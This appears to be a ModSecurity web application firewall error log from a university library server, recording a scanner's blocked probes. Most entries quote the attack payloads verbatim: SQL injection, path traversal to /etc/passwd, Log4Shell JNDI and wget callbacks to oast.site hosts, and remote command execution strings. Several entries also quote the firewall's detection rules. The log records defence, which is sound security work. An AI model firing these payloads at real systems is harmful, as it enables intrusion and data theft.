[Tue Aug 29 11:30:34.370059 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [hostname "perpustakaan.unla.ac.id"] [uri "/OA_HTML/BneViewerXMLService"] [unique_id "ZO10asCo-f0AAAPpWcgAAAAI"]
[Tue Aug 29 11:30:35.456969 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:Logon. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:Logon: ';echo md5(TestPoc);'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/mainfile.php"] [unique_id "ZO10a8Co-f0AAANjpzIAAAAT"]
[Tue Aug 29 11:30:35.500856 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:username: ' Or 1-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ccms/index.php"] [unique_id "ZO10a8Co-f0AAAPiBgYAAAAB"]
[Tue Aug 29 11:30:36.342507 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../ found within ARGS:file: /../../../context/2UdxjXFelR2tZ4yJH19Hg6ZVriU.cfm"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/lucee/admin/imgProcess.cfm"] [unique_id "ZO10bMCo-f0AAAPpWdAAAAAI"]
[Tue Aug 29 11:30:37.322709 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailuid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:mailuid: admin' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/process/aprocess.php"] [unique_id "ZO10bcCo-f0AAAPRNbAAAAAf"]
[Tue Aug 29 11:30:37.398333 2023] [:error] [pid 1001] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--   found within ARGS:uid[1]: ) and updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--  "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/public/index.php/home/index/bind_follow/"] [unique_id "ZO10bcCo-f0AAAPpWdMAAAAI"]
[Tue Aug 29 11:30:37.554099 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_FILES[type][tmp_name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =@`\\x5c'` /*! found within ARGS:_FILES[type][tmp_name]: \\x5c' or mid=@`\\x5c'` /*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9#@`\\x5c'` "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/recommend.php"] [unique_id "ZO10bcCo-f0AAAPRNbIAAAAf"]
[Tue Aug 29 11:30:37.661675 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 5"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/human.aspx"] [unique_id "ZO10bcCo-f0AAAPDnygAAAAP"]
[Tue Aug 29 11:30:39.403824 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1c606a5d0 [id "981243"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "245"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOH4UwAAAAH"]
[Tue Aug 29 11:30:39.405754 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "perpustakaan.unla.ac.id"] [uri "/SamlResponseServlet"] [unique_id "ZO10b8Co-f0AAAOH4UwAAAAH"]
[Tue Aug 29 11:30:39.549307 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:params. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:params: [{\\x22name\\x22:\\x22input_id\\x22,\\x22value\\x22:\\x22USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy\\x22},{\\x22name\\x22:\\x22input_passwd\\x22,\\x22value\\x22:\\x22PASSWORD\\x22},{\\x22name\\x22:\\x22device_id\\x22,\\x22value\\x22:\\x22xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\\x22},{\\x22name\\x22:\\x22checked\\x22,\\x22value\\x22:false},{\\x22name\\x22:\\x22login_key\\x22,\\x22value\\x22:\\x22\\x22}]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/http/index.php"] [unique_id "ZO10b8Co-f0AAAOOuXMAAAAW"]
[Tue Aug 29 11:30:42.309442 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:site[x][text]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22); ?> found within ARGS:site[x][text]: <?php echo md5(\\x22CVE-2020-5847\\x22); ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webGui/images/green-on.png/"] [unique_id "ZO10csCo-f0AAAPQkf8AAAAe"]
[Tue Aug 29 11:30:42.584483 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id: (sleep(6))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/ajax/pages.php"] [unique_id "ZO10csCo-f0AAAP05FQAAAAA"]
[Tue Aug 29 11:30:43.314501 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/OA_HTML/bispgraph.jsp\\r\\n.js"] [unique_id "ZO10c8Co-f0AAAPRNbsAAAAf"]
[Tue Aug 29 11:30:43.395151 2023] [:error] [pid 1007] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-822}${:-849}.${hostName}.username.cjmn8l5jmimk2adbbnlg63aqtoyjbfx3i.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/mifs/j_spring_security_check"] [unique_id "ZO10c8Co-f0AAAPv-GYAAAAM"]
[Tue Aug 29 11:30:44.421579 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ifl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ifl: /etc/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/OA_HTML/jsp/bsc/bscpgraph.jsp"] [unique_id "ZO10dMCo-f0AAAPmhNIAAAAV"]
[Tue Aug 29 11:30:45.326967 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO10dcCo-f0AAAPMmCwAAAAY"]
[Tue Aug 29 11:30:47.375806 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22id\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10d8Co-f0AAAOKNqcAAAAK"]
[Tue Aug 29 11:30:47.379792 2023] [:error] [pid 998] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe9\\x8c\\xa6'  found within ARGS:key: \\xe9\\x8c\\xa6' a<>nd 1=2 un<>ion sel<>ect 1,2,3,md5(999999999),5,6,7,8,9#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/plus/ajax_officebuilding.php"] [unique_id "ZO10d8Co-f0AAAPmhNkAAAAV"]
[Tue Aug 29 11:30:47.468583 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:column. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:column: (SELECT CONCAT(CONCAT(CHAR(126),(SELECT SUBSTRING((ISNULL(CAST(db_name() AS NVARCHAR(4000)),CHAR(32))),1,1024))),CHAR(126)))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/WidgetHandler.ashx"] [unique_id "ZO10d8Co-f0AAAPRNcsAAAAf"]
[Tue Aug 29 11:30:48.342016 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:username: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/admin/"] [unique_id "ZO10eMCo-f0AAAPPSxoAAAAd"]
[Tue Aug 29 11:30:48.343778 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:IP. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:IP: ;wget http:/cjmn8l5jmimk2adbbnlgd38jgnj9z5wbu.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/touchlist_sync.cgi"] [unique_id "ZO10eMCo-f0AAAPDn0sAAAAP"]
[Tue Aug 29 11:30:48.385613 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bsh.script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:bsh.script: exec(\\x22ipconfig\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlet/~ic/bsh.servlet.BshServlet"] [unique_id "ZO10eMCo-f0AAAPPSxwAAAAd"]
[Tue Aug 29 11:30:50.381139 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10esCo-f0AAAOM4ZcAAAAU"]
[Tue Aug 29 11:30:51.320664 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  ('orQN'='orQN found within ARGS:password: test') AND (SELECT 4458 FROM (SELECT(SLEEP(6)))JblN) AND ('orQN'='orQN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO10e8Co-f0AAAOM4ZoAAAAU"]
[Tue Aug 29 11:30:51.384872 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-268}${:-780}.${hostName}.username.cjmn8l5jmimk2adbbnlgn96auxkkorswa.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/c42api/v3/LoginConfiguration"] [unique_id "ZO10e8Co-f0AAAOOuaMAAAAW"]
[Tue Aug 29 11:30:51.396675 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:firmware. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:firmware: /../../../../../../../../../../Windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/server/node_upgrade_srv.js"] [unique_id "ZO10e8Co-f0AAAPDn1YAAAAP"]
[Tue Aug 29 11:30:52.337248 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x00{. found within ARGS:search: =\\x00{.cookie|df0T6L|value=CVE-2014-6287.}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10fMCo-f0AAAPOhbwAAAAa"]
[Tue Aug 29 11:30:52.339457 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fMCo-f0AAAPPSycAAAAd"]
[Tue Aug 29 11:30:53.342313 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileName: /etc/f5-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp"] [unique_id "ZO10fcCo-f0AAAN@5AMAAAAO"]
[Tue Aug 29 11:30:54.443648 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat /etc/passwd')]: name[#this.getclass().forname(java.lang.runtime).getruntime().exec(cat/etc/passwd)]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/account"] [unique_id "ZO10fsCo-f0AAAPRNdkAAAAf"]
[Tue Aug 29 11:30:54.489713 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:visitorId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:visitorId: 1331' and sleep(5) or '"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname 